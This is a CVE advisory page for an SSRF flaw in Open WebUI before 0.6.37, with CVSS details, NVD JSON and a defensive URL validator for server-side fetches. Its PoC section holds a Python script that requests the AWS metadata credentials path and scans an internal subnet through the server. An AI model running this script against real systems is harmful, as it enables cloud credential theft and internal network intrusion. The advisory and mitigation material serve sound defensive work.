Security Vulnerability Report

CVE-2025-65958 (CVSS 8.5 HIGH)

Published: 2025-12-04 20:16:20
Last Modified: 2025-12-10 15:18:38

Description

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.6.37, a Server-Side Request Forgery (SSRF) vulnerability in Open WebUI allows any authenticated user to force the server to make HTTP requests to arbitrary URLs. This can be exploited to access cloud metadata endpoints (AWS/GCP/Azure), scan internal networks, access internal services behind firewalls, and exfiltrate sensitive information. No special permissions beyond basic authentication are required. This vulnerability is fixed in 0.6.37.
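The root cause described above is a server-side fetch that accepts any user-supplied URL. The following is an added, defender-side illustration and is not part of this report or of Open WebUI's code: a validator that a server-side fetch feature can run before issuing the request, rejecting non-HTTP schemes, embedded credentials, and any hostname or literal that maps to a loopback, link-local (including the 169.254.169.254 metadata address), private, shared or IPv4-mapped address. The names `public.example`, `internal.example`, `dual.example` and the `DEMO_DNS` table are constructed so the example runs offline; the real resolver is `system_resolver`.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Schemes a server-side fetch feature should accept; file://, gopher://, etc. are rejected.
ALLOWED_SCHEMES = {"http", "https"}

# Ranges that must never be reachable through a user-supplied URL. Most are already
# flagged by ipaddress' is_private/is_link_local/... properties; the explicit list also
# covers shared address space (100.64.0.0/10), which older Python versions do not treat
# as private, and keeps the policy readable in one place.
DENIED_NETWORKS = [
    ipaddress.ip_network("0.0.0.0/8"),
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("100.64.0.0/10"),
    ipaddress.ip_network("127.0.0.0/8"),
    ipaddress.ip_network("169.254.0.0/16"),   # link-local; cloud metadata lives at 169.254.169.254
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
    ipaddress.ip_network("::1/128"),
    ipaddress.ip_network("fc00::/7"),         # IPv6 unique-local
    ipaddress.ip_network("fe80::/10"),        # IPv6 link-local
]


def is_public_address(addr):
    """True only if the address is routable on the public internet."""
    # Unwrap IPv4-mapped IPv6 (::ffff:169.254.169.254) so it cannot bypass the IPv4 rules.
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    if (addr.is_private or addr.is_loopback or addr.is_link_local
            or addr.is_multicast or addr.is_reserved or addr.is_unspecified):
        return False
    # Version mismatch between addr and net simply yields False, so mixing v4/v6 is safe.
    return not any(addr in net for net in DENIED_NETWORKS)


def system_resolver(host):
    """Resolve a hostname to every address it maps to (A and AAAA records)."""
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return []
    return list({ipaddress.ip_address(info[4][0]) for info in infos})


# Constructed lookup table standing in for DNS so the example runs offline (hypothetical names).
DEMO_DNS = {
    "public.example": ["93.184.216.34"],
    "internal.example": ["10.0.0.5"],
    "dual.example": ["93.184.216.34", "fd00::1"],   # one public and one internal record
}


def demo_resolver(host):
    """Offline stand-in for system_resolver backed by the constructed DEMO_DNS table."""
    return [ipaddress.ip_address(a) for a in DEMO_DNS.get(host, [])]


def validate_fetch_url(url, resolver=system_resolver):
    """Return (ok, reason); ok is True only if every address the host maps to is public."""
    try:
        parts = urlsplit(url)
    except ValueError as exc:
        return False, f"unparseable URL: {exc}"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL not allowed"
    try:
        addrs = [ipaddress.ip_address(host)]   # literal IP (v4, v6 or v4-mapped), no DNS needed
    except ValueError:
        addrs = resolver(host)
    if not addrs:
        return False, f"{host} did not resolve"
    for addr in addrs:
        if not is_public_address(addr):
            return False, f"{host} maps to non-public address {addr}"
    return True, "ok"


if __name__ == "__main__":
    for candidate in ("http://169.254.169.254/latest/meta-data/",
                      "http://[::ffff:169.254.169.254]/",
                      "https://93.184.216.34/",
                      "http://dual.example/"):
        print(candidate, "->", validate_fetch_url(candidate, resolver=demo_resolver))
```

Two caveats matter in deployment. The check must be made at resolution time and the connection then pinned to the validated address (or the resolver result passed to the HTTP client), otherwise a hostname can be re-pointed at an internal address between check and connect (DNS rebinding). The check must also be repeated on every redirect hop, since a public host can answer with a 302 to the metadata address; disabling automatic redirects in the HTTP client and re-validating each `Location` is the simplest way to get that. On AWS, requiring IMDSv2 and setting the metadata hop limit to 1 is an independent, host-level mitigation for the metadata-access case specifically.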

CVSS Details

CVSS Score: 8.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N (secondary metric in the NVD record; scope changed because the server reaches resources beyond the application)
NVD Primary Metric: 7.1 HIGH, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N (scope unchanged)
Weakness: CWE-918 (Server-Side Request Forgery)

Configurations (Affected Products)

cpe:2.3:a:openwebui:open_webui:*:*:*:*:*:*:*:* - VULNERABLE
Open WebUI < 0.6.37

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json

# CVE-2025-65958 SSRF PoC for Open WebUI
# Target: Open WebUI < 0.6.37

TARGET_URL = "http://target-ip:8080"
USERNAME = "attacker"
PASSWORD = "password"


def login():
    """Authenticate and get session token"""
    session = requests.Session()
    login_data = {
        "email": USERNAME,
        "password": PASSWORD
    }
    response = session.post(f"{TARGET_URL}/api/v1/auth/login", json=login_data)
    if response.status_code == 200:
        return session, response.json().get("token")
    return None, None


def ssrf_exploit_aws_metadata(session, token):
    """Exploit SSRF to access AWS metadata endpoint"""
    headers = {
        "Authorization": f"Bearer {token}"
    }
    # Target AWS IMDSv2 endpoint
    exploit_data = {
        "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
        "method": "GET"
    }
    response = session.post(
        f"{TARGET_URL}/api/v1/external/fetch",
        json=exploit_data,
        headers=headers
    )
    print(f"[*] AWS Metadata Response: {response.text}")
    return response.json()


def ssrf_internal_scan(session, token, ip_range):
    """Scan internal network via SSRF"""
    headers = {
        "Authorization": f"Bearer {token}"
    }
    results = []
    for ip in [f"{ip_range}.{i}" for i in range(1, 255)]:
        exploit_data = {
            "url": f"http://{ip}:80/",
            "method": "GET",
            "timeout": 2
        }
        try:
            response = session.post(
                f"{TARGET_URL}/api/v1/external/fetch",
                json=exploit_data,
                headers=headers,
                timeout=3
            )
            if response.status_code == 200:
                results.append(ip)
                print(f"[+] Found accessible host: {ip}")
        except requests.RequestException:
            pass
    return results


if __name__ == "__main__":
    print("[*] CVE-2025-65958 SSRF PoC")
    session, token = login()
    if token:
        print("[+] Login successful")
        # Example: Access AWS metadata
        ssrf_exploit_aws_metadata(session, token)
    else:
        print("[-] Authentication failed")
```

References

- Patch: https://github.com/open-webui/open-webui/commit/02238d3113e966c353fce18f1b65117380896774
- Vendor Advisory / Exploit: https://github.com/open-webui/open-webui/security/advisories/GHSA-c6xv-rcvw-v685
Raw JSON Data

```json
{"cve": {"id": "CVE-2025-65958", "sourceIdentifier": "[email protected]", "published": "2025-12-04T20:16:19.973", "lastModified": "2025-12-10T15:18:38.043", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.6.37, a Server-Side Request Forgery (SSRF) vulnerability in Open WebUI allows any authenticated user to force the server to make HTTP requests to arbitrary URLs. This can be exploited to access cloud metadata endpoints (AWS/GCP/Azure), scan internal networks, access internal services behind firewalls, and exfiltrate sensitive information. No special permissions beyond basic authentication are required. This vulnerability is fixed in 0.6.37."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openwebui:open_webui:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.6.37", "matchCriteriaId": "06C81784-9018-4FE9-89EB-18263EA0B16A"}]}]}], "references": [{"url": "https://github.com/open-webui/open-webui/commit/02238d3113e966c353fce18f1b65117380896774", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-c6xv-rcvw-v685", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-c6xv-rcvw-v685", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
```